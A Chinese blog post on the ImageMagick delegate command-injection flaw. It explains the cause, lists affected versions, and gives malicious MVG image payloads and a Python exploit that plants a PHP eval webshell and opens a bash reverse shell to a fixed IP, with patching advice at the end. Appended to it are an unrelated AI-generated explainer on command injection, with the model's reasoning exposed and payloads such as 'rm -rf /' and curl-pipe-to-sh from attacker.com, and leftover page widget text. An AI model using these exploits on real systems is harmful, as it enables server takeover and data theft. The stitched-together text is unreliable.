ImageMagick 命令执行漏洞

本文详细介绍了ImageMagick中的命令执行漏洞,探讨了该漏洞产生的原因、影响范围及验证方法。此外还提供了漏洞利用的示例代码,并给出了修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ImageMagick 命令执行漏洞

关于ImageMagick

  • ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。

  • 由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等。

  • 比如php有IMagick、MagickWand for PHP 、phMagick等ImageMagick拓展库,java有JMagick,python有PythonMagick、Wand 等拓展库。

漏洞原因

  • 命令执行漏洞是出在ImageMagick对https形式的文件处理的过程中。

  • ImageMagick之所以支持那么多的文件格式,是因为他内置了非常多的图像处理库,对于这些图像处理库,ImageMagick给他起了个名字叫做“Delegate”(委托),每个Delegate对应一种格式的文件,然后通过系统的system()命令来调用外部的程序对文件进行处理。

  • 其默认的配置文件在源码的config/delegates.xml.in中,一般使用者很少会去修改这个配置文件。

  • 对于https形式的文件,他是这样处理的:

"   <delegate decode=\"https\" command=\"&quot;wget&quot; -q -O &quot;%o&quot; &quot;https:%M&quot;\">"
  • %m被定义为输入的图片格式,也就是我们输入的url地址。但是由于只是做了简单的字符串拼接,所以我们可以将引号闭合后通过管道符带入其他命令,也就形成了命令注入。

  • 产生原因是因为字符过滤不严谨所导致的执行代码.对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。

影响版本范围

  • ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)
  • ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
  • 低版本至6.9.3-9released 2016-04-30

漏洞验证

  1. 命令验证
    1. 若系统中安装使用了ImageMagick,本地执行如下命令:
    2. convert ‘https://example.com”|ls “-la’ out.png
    3. 若ls -la 命令成功执行,说明存在漏洞。未执行ls命令,并报错,说明不受影响。
  2. poc验证
    • 先构建一个精心准备的图片:
vi exp1.jpg
push graphic -context
viewbox 0 0 640480
fill'url(https://"|id && ls -al /etc/passwd")'
popg raphic -context
  • 执行攻击POC1,虽然有报错,但是两条命令都成功绕出执行了,

  • 就说明漏洞是存在的

  • 那么在制作一个远程下载反弹shell脚本,并且执行shell命令:

  • 执行成功,上接受服务器看去:Root权限的反弹shell就这样上来了.

漏洞利用

  • poc的主要内容
python
#!/usr/bin/env python
# coding:utf-8

import requests
import base64


def doPost(url, data):
    post_data = {"img": base64.b64encode(data)}
    try:
        requests.post(url + "/poc.php", data=post_data, timeout=1)
    except:
        pass


# 写 webshell
def writeshell(url):
    writeshell = """push graphic-context
viewbox 0 0 640 480
fill "url(https://example.com/1.jpg"|echo \"<?php eval($_POST[\"ant\"]);?>\" > shell.php")"
pop graphic-context
"""
    doPost(url, writeshell)
    resp2 = requests.post(url + "/shell.php", data={"ant": "echo md5(123);"})
    if resp2.status_code == 200 and "202cb962ac59075b964b07152d234b70" in resp2.content:
        print "WebShell: " + url + "shell.php"

def reverse_shell(url):    
    reverse_shell = """push graphic-context
viewbox 0 0 640 480
fill "url(https://example.com/1.jpg"|bash -i >& /dev/tcp/192.168.1.101/2333 0>&1")"
pop graphic-context"""

    # 反弹 shell
    doPost(url, reverse_shell)

if __name__ == "__main__":
    # 写 webshell
    writeshell("http://172.16.11.2:8080/")
    # 反弹 shell
    # reverse_shell("http://127.0.0.1:8000/")
  • 它的功能是在网站根目录写入一句话木马,生成shell.php脚本。接下来我们执行它,执行命令
python poc.py            //使用python解释poc.py文件
  • 执行成功后,会返回一句话木马的地址。

漏洞修复

  • 将ImageMagick升级至6.9.3-10版本可修复此安全漏洞
  • 用户方进行临时修复
    1. 在上传图片时需要通过文件内容来判断用户上传的是否为真实图片类型.
    2. 使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加如下代码:

      <policymap>
      <policy domain="coder" rights="none" pattern="EPHEMERAL" />
      <policy domain="coder" rights="none" pattern="URL" />
      <policy domain="coder" rights="none" pattern="HTTPS" />
      <policy domain="coder" rights="none" pattern="MVG" />
      <policy domain="coder" rights="none" pattern="MSL" />
      </policymap>
<think>好的,我现在需要回答用户关于命令注入漏洞的工作原理、形成原因及利用机制的问题。首先,我应该回顾用户提供的引用资料,提取关键信息,并组织成结构清晰的回答。 首先,用户提到的四个引用中,引用[3]详细解释了命令注入漏洞的本质和工作机制,包括用户输入捕获、未过滤的输入、恶意构造和命令执行四个步骤。引用[1]和[4]提到了漏洞的形成原因,如代码层过滤不严、系统漏洞、第三方组件问题等。引用[2]虽然关于SQL注入,但可能对理解注入类漏洞有帮助,不过这里主要关注命令注入。 我需要将形成原因和机制分开阐述。形成原因包括输入验证不足、直接拼接命令、系统或第三方漏洞。利用机制则是攻击者如何构造输入,绕过过滤,执行恶意命令。比如使用特殊字符如分号、管道符等分隔命令,或者利用环境变量注入。 同时,用户要求生成相关问题,我需要确保问题相关且覆盖漏洞防御、检测、案例、区别等方面。例如,如何防御,检测方法,历史案例,与代码执行漏洞的区别等。 要注意使用中文,数学公式用$...$,独立公式用$$...$$,但这里可能涉及较少数学内容。同时要自然添加引用标识,例如在解释过滤不严时引用[4],在机制部分引用[3]。 最后,确保回答结构清晰,分点说明原因和机制,并附上相关问题。避免使用Markdown格式,使用有序列表和段落分隔。检查是否符合所有系统级指令,如引用正确,LaTeX正确,生成的问题相关且合理。</think>### 命令注入漏洞的工作原理 #### 一、形成原因 1. **输入验证不足** 程序未对用户输入进行充分过滤或验证,直接将其与系统命令拼接。例如,使用`system()`函数调用时未处理用户可控参数[^4]。 例如:`system("ping " + user_input)`,若用户输入`8.8.8.8; rm -rf /`,会导致后续命令被执行。 2. **命令拼接逻辑不安全** 开发者将用户输入与固定命令字符串直接组合,未使用安全的参数化方式(如白名单或转义特殊字符)。例如: ```php $cmd = "nslookup " . $_GET['domain']; exec($cmd); // 直接拼接存在风险 ``` 3. **依赖不安全的环境或组件** - 系统本身存在漏洞(如CVE-2014-6271 Bash破壳漏洞)。 - 第三方库(如ImageMagick、Struts2)存在命令执行缺陷。 #### 二、利用机制 攻击者通过以下步骤实现命令注入: 1. **构造恶意输入** 在用户输入中插入命令分隔符(如`;`、`&&`、`|`)或环境变量注入符号(如`${}`)。 示例:输入`example.com; cat /etc/passwd`,拼接后命令变为: $$ \text{nslookup example.com; cat /etc/passwd} $$ 2. **绕过过滤规则** - 使用编码或通配符绕过黑名单过滤,如`\u003b`(Unicode分号)或`/???/passwd`(通配符匹配路径)[^3]。 - 利用环境变量注入:`$(id)`或`` `id` ``执行子命令。 3. **执行任意命令** 恶意输入被操作系统解释为合法命令,导致信息泄露、数据破坏或系统控制。例如: ```bash curl http://attacker.com/exploit.sh | sh # 下载并执行恶意脚本 ``` #### 三、典型场景 - Web应用调用命令行工具(如Ping、Dig)。 - 内容管理系统(CMS)调用外部程序处理文件上传[^1]。 - 服务器管理界面执行系统命令(如重启服务)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值